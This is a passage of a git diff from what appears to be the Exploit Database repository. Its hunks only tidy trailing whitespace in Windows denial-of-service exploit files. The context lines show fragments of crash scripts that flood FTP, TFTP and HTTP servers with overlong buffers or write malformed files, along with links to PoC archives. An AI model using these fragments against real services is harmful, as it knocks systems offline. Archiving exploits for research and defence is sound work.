Malicious session file successfully crafted!\r\n\n"; +print "\n[*] Malicious session file successfully crafted!\r\n\n"; \ No newline at end of file diff --git a/platforms/windows/dos/17363.pl b/platforms/windows/dos/17363.pl index 76d761f70..1153f4d5c 100755 --- a/platforms/windows/dos/17363.pl +++ b/platforms/windows/dos/17363.pl @@ -49,4 +49,4 @@ open(FILE,">$filename") || die "[-]Error:\n$!\n"; print FILE $zip; close(FILE); print "[+] ZIP File Created With Sucess:)\n"; -sleep(3); +sleep(3); \ No newline at end of file diff --git a/platforms/windows/dos/17372.txt b/platforms/windows/dos/17372.txt index a4e2c8e75..3accef2b3 100755 --- a/platforms/windows/dos/17372.txt +++ b/platforms/windows/dos/17372.txt @@ -126,5 +126,4 @@ TIMELINE 03062011 Contacted vendor with PoC 05062011 Bug fixed by vendor - 08062011 Patch release to public in 1.1.10 - + 08062011 Patch release to public in 1.1.10 \ No newline at end of file diff --git a/platforms/windows/dos/17398.txt b/platforms/windows/dos/17398.txt index 3f175e6a5..616749ec5 100755 --- a/platforms/windows/dos/17398.txt +++ b/platforms/windows/dos/17398.txt @@ -257,4 +257,4 @@ controls Code Flow starting at MP4Splitter!DllRegisterServer+0x0000000000005a41 (Hash=0x312e650b.0x312e1f0b) -The data from the faulting address is later used as the target for a branch. +The data from the faulting address is later used as the target for a branch. \ No newline at end of file diff --git a/platforms/windows/dos/17405.txt b/platforms/windows/dos/17405.txt index 30d950001..e1216561f 100755 --- a/platforms/windows/dos/17405.txt +++ b/platforms/windows/dos/17405.txt @@ -25,5 +25,4 @@ The following JS was the problem point inside the PDF file (Open the PoC file by dirty; // Important! /*****************************************************************************/ -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17405.pdf - +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17405.pdf \ No newline at end of file diff --git a/platforms/windows/dos/17421.py b/platforms/windows/dos/17421.py index 69b4598e6..107c97220 100755 --- a/platforms/windows/dos/17421.py +++ b/platforms/windows/dos/17421.py @@ -45,4 +45,4 @@ f.close() print "Done, 2nd file generated on 'C:\\' ..." print "Open this file in XnView 1.98 and enjoy ;)" - + \ No newline at end of file diff --git a/platforms/windows/dos/1743.pl b/platforms/windows/dos/1743.pl index 922287564..af6ea824c 100755 --- a/platforms/windows/dos/1743.pl +++ b/platforms/windows/dos/1743.pl @@ -40,4 +40,4 @@ $exploit_string = "./A" x 1000; exploit : DoS\nhttps://www.securinfos.info\n\nUsing: $0 host port [debug: 1 or 0] username password\n\n"; } -# milw0rm.com [2006-05-03] +# milw0rm.com [2006-05-03] \ No newline at end of file diff --git a/platforms/windows/dos/17455.rb b/platforms/windows/dos/17455.rb index 3ecb37fa0..73a840a95 100755 --- a/platforms/windows/dos/17455.rb +++ b/platforms/windows/dos/17455.rb @@ -56,5 +56,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/platforms/windows/dos/17458.txt b/platforms/windows/dos/17458.txt index 7ba039c3e..e5e06863f 100755 --- a/platforms/windows/dos/17458.txt +++ b/platforms/windows/dos/17458.txt @@ -322,4 +322,4 @@ Version: GnuPG v1.4.9 (MingW32) iEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo CwCfTapBtDaQT/LBrrVC7K4l8G5hnEo= =ozGY ------END PGP SIGNATURE----- +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/windows/dos/17461.txt b/platforms/windows/dos/17461.txt index 0b97d58a9..7657a9c9a 100755 --- a/platforms/windows/dos/17461.txt +++ b/platforms/windows/dos/17461.txt @@ -309,4 +309,4 @@ Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay EAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo =zHon ------END PGP SIGNATURE----- +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/windows/dos/17471.py b/platforms/windows/dos/17471.py index aded2e3e4..1fb4b7060 100755 --- a/platforms/windows/dos/17471.py +++ b/platforms/windows/dos/17471.py @@ -20,4 +20,4 @@ FILE = open(filename, "w") FILE.write(junk) FILE.close() print " Open", filename, "on Donar Player and play it.. (the application will Crash)" -print " PirateAL Crew" +print " PirateAL Crew" \ No newline at end of file diff --git a/platforms/windows/dos/17476.rb b/platforms/windows/dos/17476.rb index a2658dc91..2b6d42c95 100755 --- a/platforms/windows/dos/17476.rb +++ b/platforms/windows/dos/17476.rb @@ -114,4 +114,4 @@ class Metasploit3 < Msf::Auxiliary ret end -end +end \ No newline at end of file diff --git a/platforms/windows/dos/1748.py b/platforms/windows/dos/1748.py index f572a4991..4ba75e6c1 100755 --- a/platforms/windows/dos/1748.py +++ b/platforms/windows/dos/1748.py @@ -31,4 +31,4 @@ try: except: print "[+] Could Not Connect To ftp server" -# milw0rm.com [2006-05-04] +# milw0rm.com [2006-05-04] \ No newline at end of file diff --git a/platforms/windows/dos/1749.pl b/platforms/windows/dos/1749.pl index fb0090c92..a29e82ff1 100755 --- a/platforms/windows/dos/1749.pl +++ b/platforms/windows/dos/1749.pl @@ -48,4 +48,4 @@ print "################################################\n"; close($socket); } -# milw0rm.com [2006-05-04] +# milw0rm.com [2006-05-04] \ No newline at end of file diff --git a/platforms/windows/dos/17497.txt b/platforms/windows/dos/17497.txt index 494fdc436..fd008e33f 100755 --- a/platforms/windows/dos/17497.txt +++ b/platforms/windows/dos/17497.txt @@ -43,4 +43,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5023.php PoC: - http://www.zeroscience.mk/codes/alplayer_bof.rar - - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17497.rar (alplayer_bof.rar) + - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17497.rar (alplayer_bof.rar) \ No newline at end of file diff --git a/platforms/windows/dos/17509.pl b/platforms/windows/dos/17509.pl index a6c798303..0b8645dfd 100755 --- a/platforms/windows/dos/17509.pl +++ b/platforms/windows/dos/17509.pl @@ -298,8 +298,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202 image00400000+0x5de1a: 0045de1a 8b44ca5c mov eax,dword ptr [edx+ecx*8+5Ch] ds:0023:aab955ac=???????? -=cut - - - - +=cut \ No newline at end of file diff --git a/platforms/windows/dos/17512.pl b/platforms/windows/dos/17512.pl index 4c2d34fb7..5a41b8dee 100755 --- a/platforms/windows/dos/17512.pl +++ b/platforms/windows/dos/17512.pl @@ -49,4 +49,4 @@ open(FILE,">$filename") || die "[-]Error:\n$!\n"; print FILE $zip; close(FILE); print "[+] ZIP File Created With Sucess:)\n"; -sleep(1); +sleep(1); \ No newline at end of file diff --git a/platforms/windows/dos/1754.py b/platforms/windows/dos/1754.py index a421c6b9e..eac8ca821 100755 --- a/platforms/windows/dos/1754.py +++ b/platforms/windows/dos/1754.py @@ -39,4 +39,4 @@ s.send('USER %s\r\n' % buffer) time.sleep(1) sys.exit(0) -# milw0rm.com [2006-05-05] +# milw0rm.com [2006-05-05] \ No newline at end of file diff --git a/platforms/windows/dos/17544.txt b/platforms/windows/dos/17544.txt index ecc300073..b15fdbbfa 100755 --- a/platforms/windows/dos/17544.txt +++ b/platforms/windows/dos/17544.txt @@ -166,6 +166,4 @@ corruptions using a standalone file. . feel free to contact us at : info [at] abysssec.com PoC link : http://abysssec.com/files/GDI_PoC.zip -PoC Mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17544.zip (GDI_PoC.zip) - - +PoC Mirror : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17544.zip (GDI_PoC.zip) \ No newline at end of file diff --git a/platforms/windows/dos/17569.py b/platforms/windows/dos/17569.py index 19d74f0bb..62720dc3e 100755 --- a/platforms/windows/dos/17569.py +++ b/platforms/windows/dos/17569.py @@ -27,5 +27,4 @@ print "File name READ crash" #seems to only work on a READ command = x01 pwned = "\x00\x01" + crash + "\0" + mode + "\0" s.sendto(pwned, (host, port)) -time.sleep(2) - +time.sleep(2) \ No newline at end of file diff --git a/platforms/windows/dos/1757.c b/platforms/windows/dos/1757.c index 916f6f115..d5ec4c767 100755 --- a/platforms/windows/dos/1757.c +++ b/platforms/windows/dos/1757.c @@ -111,4 +111,4 @@ close(sock); printf("DoS Attack Done!\n"); } -// milw0rm.com [2006-05-06] +// milw0rm.com [2006-05-06] \ No newline at end of file diff --git a/platforms/windows/dos/1758.pl b/platforms/windows/dos/1758.pl index afbc720fb..970ddfdf5 100755 --- a/platforms/windows/dos/1758.pl +++ b/platforms/windows/dos/1758.pl @@ -33,4 +33,4 @@ close($socket); print "[?] DoSed?\n"; -# milw0rm.com [2006-05-06] +# milw0rm.com [2006-05-06] \ No newline at end of file diff --git a/platforms/windows/dos/17580.py b/platforms/windows/dos/17580.py index 5f9aa4431..47eccda3c 100755 --- a/platforms/windows/dos/17580.py +++ b/platforms/windows/dos/17580.py @@ -31,4 +31,4 @@ try: print sock.recv(1024) sock.close() except: - print "hmmm, done" + print "hmmm, done" \ No newline at end of file diff --git a/platforms/windows/dos/176.c b/platforms/windows/dos/176.c index 17a6b8a8f..1ce8e7e3d 100755 --- a/platforms/windows/dos/176.c +++ b/platforms/windows/dos/176.c @@ -313,4 +313,4 @@ ssl_hello.compression_method = 0x00; -// milw0rm.com [2004-04-14] +// milw0rm.com [2004-04-14] \ No newline at end of file diff --git a/platforms/windows/dos/17601.py b/platforms/windows/dos/17601.py index dc211de5d..f1e30c034 100755 --- a/platforms/windows/dos/17601.py +++ b/platforms/windows/dos/17601.py @@ -30,6 +30,4 @@ try: counter+=1 except: print "[-] "+target+" has been knocked out with a right hook!" - sys.exit(0) - - + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/dos/17618.py b/platforms/windows/dos/17618.py index f8fc4da8d..fc9441959 100755 --- a/platforms/windows/dos/17618.py +++ b/platforms/windows/dos/17618.py @@ -41,4 +41,4 @@ print "File name WRITE crash" # WRITE command = \x00\x02 data = "\x00\x02" + exploit + "\0" + mode + "\0" sock.sendto(data, (target, port)) -time.sleep(5) +time.sleep(5) \ No newline at end of file diff --git a/platforms/windows/dos/17638.py b/platforms/windows/dos/17638.py index a64c513ee..30989d297 100755 --- a/platforms/windows/dos/17638.py +++ b/platforms/windows/dos/17638.py @@ -37,8 +37,4 @@ s.recv(1024) s.send("PASV "+crash+"\r\n") print "Sleeping..." time.sleep(5) -s.close() - - - - +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/17643.pl b/platforms/windows/dos/17643.pl index 995dd5fb9..ba6b1d93c 100755 --- a/platforms/windows/dos/17643.pl +++ b/platforms/windows/dos/17643.pl @@ -13,5 +13,4 @@ open (FILE, '>>CVE-2011-1276.slk'); print FILE "ID;P\n"; print FILE "P;PAAAA\n"x550; print FILE "P"; -close (FILE); - +close (FILE); \ No newline at end of file diff --git a/platforms/windows/dos/17658.py b/platforms/windows/dos/17658.py index 766a40ba6..64755225c 100755 --- a/platforms/windows/dos/17658.py +++ b/platforms/windows/dos/17658.py @@ -25,5 +25,4 @@ s.connect(('192.168.1.101',80)) s.send("PUT /" + buf + "/ HTTP/1.0\r\n") s.send("\r\n") print s.recv(1024) -s.close() - +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/17664.py b/platforms/windows/dos/17664.py index c9c53965f..a24d1ec49 100755 --- a/platforms/windows/dos/17664.py +++ b/platforms/windows/dos/17664.py @@ -19,4 +19,4 @@ fd.write("BBBB"); fd.write("CCCC"); for i in range(0, 2000): fd.write(data); -fd.close() +fd.close() \ No newline at end of file diff --git a/platforms/windows/dos/17676.py b/platforms/windows/dos/17676.py index 33bb0e1be..874b8b566 100755 --- a/platforms/windows/dos/17676.py +++ b/platforms/windows/dos/17676.py @@ -143,4 +143,4 @@ while 1: print "Waiting for target.." ftp_server().main() except socket.error: - print "Rebooting server...\n" + print "Rebooting server...\n" \ No newline at end of file diff --git a/platforms/windows/dos/17742.py b/platforms/windows/dos/17742.py index a83fb992c..1b7875b73 100755 --- a/platforms/windows/dos/17742.py +++ b/platforms/windows/dos/17742.py @@ -101,4 +101,4 @@ try: try: s.connect((host,21)) except: print ("\r\n[*] Host is down!") -except: print ("[*] Oops!") +except: print ("[*] Oops!") \ No newline at end of file diff --git a/platforms/windows/dos/1775.html b/platforms/windows/dos/1775.html index 91975aa54..8dd01eea1 100755 --- a/platforms/windows/dos/1775.html +++ b/platforms/windows/dos/1775.html @@ -39,4 +39,4 @@ width: 1268; </td> </table> -# milw0rm.com [2006-05-10] +# milw0rm.com [2006-05-10] \ No newline at end of file diff --git a/platforms/windows/dos/1781.txt b/platforms/windows/dos/1781.txt index a18cf0367..9b6f4acf7 100755 --- a/platforms/windows/dos/1781.txt +++ b/platforms/windows/dos/1781.txt @@ -2,4 +2,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1781.zip (05132006-outgunx.zip) -# milw0rm.com [2006-05-14] +# milw0rm.com [2006-05-14] \ No newline at end of file diff --git a/platforms/windows/dos/1782.txt b/platforms/windows/dos/1782.txt index d9feaadc5..cd7ca03cf 100755 --- a/platforms/windows/dos/1782.txt +++ b/platforms/windows/dos/1782.txt @@ -2,4 +2,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1782.zip (05132006-empiredos.zip) -# milw0rm.com [2006-05-14] +# milw0rm.com [2006-05-14] \ No newline at end of file diff --git a/platforms/windows/dos/1783.txt b/platforms/windows/dos/1783.txt index 2884452dd..683efbda8 100755 --- a/platforms/windows/dos/1783.txt +++ b/platforms/windows/dos/1783.txt @@ -2,4 +2,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1783.zip (05132006-genecysbof.zip) -# milw0rm.com [2006-05-14] +# milw0rm.com [2006-05-14] \ No newline at end of file diff --git a/platforms/windows/dos/17830.txt b/platforms/windows/dos/17830.txt index 4285c6cfa..4dcab55fa 100755 --- a/platforms/windows/dos/17830.txt +++ b/platforms/windows/dos/17830.txt @@ -238,4 +238,4 @@ http://www.microsoft.com/technet/security/bulletin/ms11-035.mspx --- Luigi Auriemma -http://aluigi.org +http://aluigi.org \ No newline at end of file diff --git a/platforms/windows/dos/17835.txt b/platforms/windows/dos/17835.txt index af2372301..12a91bf77 100755 --- a/platforms/windows/dos/17835.txt +++ b/platforms/windows/dos/17835.txt @@ -69,4 +69,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17836.txt b/platforms/windows/dos/17836.txt index 5f48f324a..24dafbaf7 100755 --- a/platforms/windows/dos/17836.txt +++ b/platforms/windows/dos/17836.txt @@ -81,4 +81,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17837.txt b/platforms/windows/dos/17837.txt index 77805f076..79a1364a8 100755 --- a/platforms/windows/dos/17837.txt +++ b/platforms/windows/dos/17837.txt @@ -100,4 +100,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17838.txt b/platforms/windows/dos/17838.txt index 7605bd2b4..4eb01a4cb 100755 --- a/platforms/windows/dos/17838.txt +++ b/platforms/windows/dos/17838.txt @@ -81,4 +81,4 @@ port 4053 uses the same protocol via SSL. No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17839.txt b/platforms/windows/dos/17839.txt index c48297f96..44b1e3780 100755 --- a/platforms/windows/dos/17839.txt +++ b/platforms/windows/dos/17839.txt @@ -70,4 +70,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/1784.txt b/platforms/windows/dos/1784.txt index dc67195d2..3361fd9a4 100755 --- a/platforms/windows/dos/1784.txt +++ b/platforms/windows/dos/1784.txt @@ -1,5 +1,3 @@ # Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1784.zip (05132006-raydiumx.zip) - - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1784.zip (05132006-raydiumx.zip) \ No newline at end of file diff --git a/platforms/windows/dos/17841.txt b/platforms/windows/dos/17841.txt index 2e71c0629..c419feebf 100755 --- a/platforms/windows/dos/17841.txt +++ b/platforms/windows/dos/17841.txt @@ -88,4 +88,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17842.txt b/platforms/windows/dos/17842.txt index 9c99c6c75..485a4b6bb 100755 --- a/platforms/windows/dos/17842.txt +++ b/platforms/windows/dos/17842.txt @@ -132,4 +132,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17843.txt b/platforms/windows/dos/17843.txt index d67b1c18b..4048f982b 100755 --- a/platforms/windows/dos/17843.txt +++ b/platforms/windows/dos/17843.txt @@ -74,4 +74,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17844.txt b/platforms/windows/dos/17844.txt index 37d41157b..0cf936640 100755 --- a/platforms/windows/dos/17844.txt +++ b/platforms/windows/dos/17844.txt @@ -152,4 +152,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17878.txt b/platforms/windows/dos/17878.txt index 8f43be1c1..f8ac436b2 100755 --- a/platforms/windows/dos/17878.txt +++ b/platforms/windows/dos/17878.txt @@ -130,4 +130,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17879.txt b/platforms/windows/dos/17879.txt index b1676c7cf..860a971a0 100755 --- a/platforms/windows/dos/17879.txt +++ b/platforms/windows/dos/17879.txt @@ -96,4 +96,4 @@ B] No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17885.txt b/platforms/windows/dos/17885.txt index a0d5e3cc5..c2682bd2b 100755 --- a/platforms/windows/dos/17885.txt +++ b/platforms/windows/dos/17885.txt @@ -280,4 +280,4 @@ H] No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17889.txt b/platforms/windows/dos/17889.txt index 5040d3e24..5b853bff8 100755 --- a/platforms/windows/dos/17889.txt +++ b/platforms/windows/dos/17889.txt @@ -104,4 +104,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17890.c b/platforms/windows/dos/17890.c index d902410be..3f069fce4 100755 --- a/platforms/windows/dos/17890.c +++ b/platforms/windows/dos/17890.c @@ -96,4 +96,4 @@ int __cdecl main(int argc, char* argv[]) } getch(); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/17896.txt b/platforms/windows/dos/17896.txt index 3979a9828..3755c88a0 100755 --- a/platforms/windows/dos/17896.txt +++ b/platforms/windows/dos/17896.txt @@ -118,4 +118,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17903.txt b/platforms/windows/dos/17903.txt index c2fe93f12..00710abb7 100755 --- a/platforms/windows/dos/17903.txt +++ b/platforms/windows/dos/17903.txt @@ -79,4 +79,4 @@ the 16bit value for EDX is located at offset 0x8bd. No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17918.txt b/platforms/windows/dos/17918.txt index 83a450ff6..956dd297c 100755 --- a/platforms/windows/dos/17918.txt +++ b/platforms/windows/dos/17918.txt @@ -114,6 +114,4 @@ REF #2: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4940.php Proof Of Concept: ----------------- http://www.zeroscience.mk/codes/brush_gradiently.rar (11071 bytes) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17918.rar (brush_gradiently.rar) - - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17918.rar (brush_gradiently.rar) \ No newline at end of file diff --git a/platforms/windows/dos/1792.txt b/platforms/windows/dos/1792.txt index 037b7e756..462dc71af 100755 --- a/platforms/windows/dos/1792.txt +++ b/platforms/windows/dos/1792.txt @@ -1,3 +1,3 @@ # GNUnet <= 0.7.0d (Empty UDP Packet) Remote Denial of Service Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1792.zip (05152006-udpsz.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1792.zip (05152006-udpsz.zip) \ No newline at end of file diff --git a/platforms/windows/dos/17930.txt b/platforms/windows/dos/17930.txt index e2346639d..f6ed94fb9 100755 --- a/platforms/windows/dos/17930.txt +++ b/platforms/windows/dos/17930.txt @@ -104,4 +104,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17931.txt b/platforms/windows/dos/17931.txt index d7ffd792c..aab47f452 100755 --- a/platforms/windows/dos/17931.txt +++ b/platforms/windows/dos/17931.txt @@ -135,4 +135,4 @@ B] modified 32bit field at offset 0x302 and added 'a's No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17963.txt b/platforms/windows/dos/17963.txt index 440d9518b..289cdad9a 100755 --- a/platforms/windows/dos/17963.txt +++ b/platforms/windows/dos/17963.txt @@ -137,4 +137,4 @@ D] No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17964.txt b/platforms/windows/dos/17964.txt index 503f994fc..b4be606cd 100755 --- a/platforms/windows/dos/17964.txt +++ b/platforms/windows/dos/17964.txt @@ -87,4 +87,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17965.txt b/platforms/windows/dos/17965.txt index 371a1dd38..f9c3c6917 100755 --- a/platforms/windows/dos/17965.txt +++ b/platforms/windows/dos/17965.txt @@ -73,4 +73,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/17978.txt b/platforms/windows/dos/17978.txt index d97fc582e..28c9dc0d2 100755 --- a/platforms/windows/dos/17978.txt +++ b/platforms/windows/dos/17978.txt @@ -13,4 +13,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp http://exploitshop.wordpress.com/2011/10/12/ms11-077-vulnerabilities-in-windows-kernel-mode-drivers-could-allow-remote-code-execution-2567053/ -Byoungyoung +Byoungyoung \ No newline at end of file diff --git a/platforms/windows/dos/17981.py b/platforms/windows/dos/17981.py index c6803b6d5..a6bf9b8a6 100755 --- a/platforms/windows/dos/17981.py +++ b/platforms/windows/dos/17981.py @@ -39,4 +39,4 @@ def tryOnce(i,j): return if __name__ == '__main__': - tryOnce(0x3c,0x7) + tryOnce(0x3c,0x7) \ No newline at end of file diff --git a/platforms/windows/dos/17982.pl b/platforms/windows/dos/17982.pl index 15d6ab102..e42d501f4 100755 --- a/platforms/windows/dos/17982.pl +++ b/platforms/windows/dos/17982.pl @@ -13,4 +13,4 @@ my $junk = "A" x 20; open($File, ">$file"); print $File $head.$junk; -close($FILE); +close($FILE); \ No newline at end of file diff --git a/platforms/windows/dos/18006.html b/platforms/windows/dos/18006.html index 82853431d..3fc109d0e 100755 --- a/platforms/windows/dos/18006.html +++ b/platforms/windows/dos/18006.html @@ -63,5 +63,4 @@ template.html: function sj_wf(a){var b=arguments;return function(){a.apply(null,[].slice.apply(b).slice(1))}};function sj_ce(d,c,b){var a=_d.createElement(d);if(c)a.id=c;if(b)a.className=b;return a};function sj_be(a,b,c,d){if((a==_w||a==_d.body)&&b=="load")if("undefined"!=typeof _d.readyState&&"complete"===_d.readyState){c();return}if(a.addEventListener)a.addEventListener(b,c,d);else if(a.attachEvent)a.attachEvent("on"+b,c);else a["on"+b]=c}function sj_ue(a,b,c,d){if(a.removeEventListener)a.removeEventListener(b,c,d);else if(a.detachEvent)a.detachEvent("on"+b,c);else a["on"+b]=null};function sj_jb(h,f){for(var b=arguments,e,d,a=2,g={n:h};a<b.length;a+=2){e=b[a];d=b[a+1];sj_be(e,d,sj_wf(c,g,f,e,d))}a<3&&c(g,f);function c(a,d,b,e){b&&sj_ue(b,e,c);sj_evt.bind("onP1",function(){if(!a.l){a.l=1;var b=sj_ce("script");b.src=(d?"/fd/sa/"+_G.Ver:"/sa/"+_G.AppVer)+"/"+a.n+".js";sj_b.appendChild(b)}},1,5)}};function sj_ev(a){return sb_ie?event:a}function sj_et(a){return sb_ie?event.srcElement:a.target}function sj_mi(a){return sb_ie?event.fromElement:a.relatedTarget}function sj_mo(a){return sb_ie?event.toElement:a.relatedTarget};function sj_pd(a){if(sb_ie)event.returnValue=false;else a.preventDefault()};function sj_sp(a){if(sb_ie)a.cancelBubble=true;else a.stopPropagation()};function sj_we(a,c,b){while(a&&a!=(b||sj_b)){if(a==c)return!0;a=a.parentNode}return!1};function sj_go(a,c,d){var b=0;while(a.offsetParent&&a!=(d||sj_b)){b+=a["offset"+c];a=a.offsetParent}return b};function sj_anim(k){var a=this,j,d,h,g,c,e,i,b,f;a.init=function(m,g,k,l,h){j=m;c=g;e=k;i=l;f=h;if(!b)b=c;!d&&a.start()};a.start=function(){h=sb_gt();g=Math.abs(e-c-b)/i*25;d=setInterval(a.next,25)};a.stop=function(){clearInterval(d);d=0};a.next=function(){var d=sb_gt()-h;b=c+(e-c)*d/g;if(d>=g){a.stop();b=e;f&&f()}k(j,b)}};function sj_so(b,a){b.style.filter=a>=100?"":"alpha(opacity="+a+")";b.style.opacity=a/100};function sj_fader(){return new sj_anim(function(b,a){sj_so(b,a)})};sj_fade=new function(){this.up=function(b,c,d){a(b,0,100,c,e,d,1);function e(){b.style.visibility="visible"}};this.down=function(c,d,b){a(c,100,0,d,0,e,0);function e(){c.style.visibility="hidden";b&&b()}};function a(a,e,h,f,d,g,c){var b=a.fader;if(b){if(c==a.fIn)return}else{b=sj_fader();a.fader=b}d&&d();b.init(a,e,h,f,g);a.fIn=c}};function sj_gx(){return sb_i6?new ActiveXObject("MSXML2.XMLHTTP"):new XMLHttpRequest};(function(){var e,a=0,c=sj_evt,b=[];_w.si_PP&&b.push("onPP");for(;a<b.length;a++)c.bind(b[e=a],d,1);!a&&d();function d(){--e<1&&c.fire("onP1")}})();function lb(){var e=sj_evt,f="onSbBusy",b;e.bind(f,d,1);function d(a){b=a[1];e.unbind(f,d)}for(var a=1;a<4;++a){var g="sb_form"+(a>1?a:""),c=_ge(g);c&&!(b&&_ge(g+"_q")==b)&&c.reset&&c.reset()}_w.si_sendCReq&&sb_st(si_sendCReq,800);_w.lbc&&lbc()}(function(){var a=sj_evt,c="onSbBusy",b=null;a.bind(c,function(){sb_ct(b);b=sb_st(sj_wf(a.fire,"onSbIdle"),1100)});sj_be(_d,"keydown",function(b){a.fire(c,sj_et(b))})})();sj_evt.bind("onHTML",function(){var a=_ge("sb_form");a&&sj_be(a,"submit",sj_wf(sj_evt.fire,"onSearch",a))});function init(){}; //]]></script> </html> -</body> - +</body> \ No newline at end of file diff --git a/platforms/windows/dos/18008.html b/platforms/windows/dos/18008.html index 531ee9395..70237d9e2 100755 --- a/platforms/windows/dos/18008.html +++ b/platforms/windows/dos/18008.html @@ -63,4 +63,4 @@ template2.html: function addSpacesToResults(){try{for(var b=_d.getElementsByTagName("cite"),a=0;a<b.length;a++){el=b[a];firstNode=el.firstChild.nodeName;if(el.textContent.length>40&&(firstNode=="#text"||firstNode=="STRONG"))el.innerHTML=el.innerHTML.replace(/((^|>)[^<>]*(&|[\/\?\;\_\&\%]))/g,"TEST")}}catch(c){}}sj_be(_w,"load",addSpacesToResults); //]]></script> <html> -<body> +<body> \ No newline at end of file diff --git a/platforms/windows/dos/18014.html b/platforms/windows/dos/18014.html index 0c86d78e6..715c82e34 100755 --- a/platforms/windows/dos/18014.html +++ b/platforms/windows/dos/18014.html @@ -47,4 +47,4 @@ spray(); // if this is removed Opera won't crash <strong contenteditable="true">a</strong> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/18017.py b/platforms/windows/dos/18017.py index f6452c21f..188638780 100755 --- a/platforms/windows/dos/18017.py +++ b/platforms/windows/dos/18017.py @@ -42,4 +42,4 @@ s.connect(('xxx.xxx.xxx.xxx',8585)) #Enter Cyclope server IP address s.send(buffer) s.close() -print "\nDone! " +print "\nDone! " \ No newline at end of file diff --git a/platforms/windows/dos/18019.txt b/platforms/windows/dos/18019.txt index 7f8927f46..15035480a 100755 --- a/platforms/windows/dos/18019.txt +++ b/platforms/windows/dos/18019.txt @@ -54,4 +54,4 @@ template.html: <body> <script>(function(){var d=document;if(!("autofocus" in 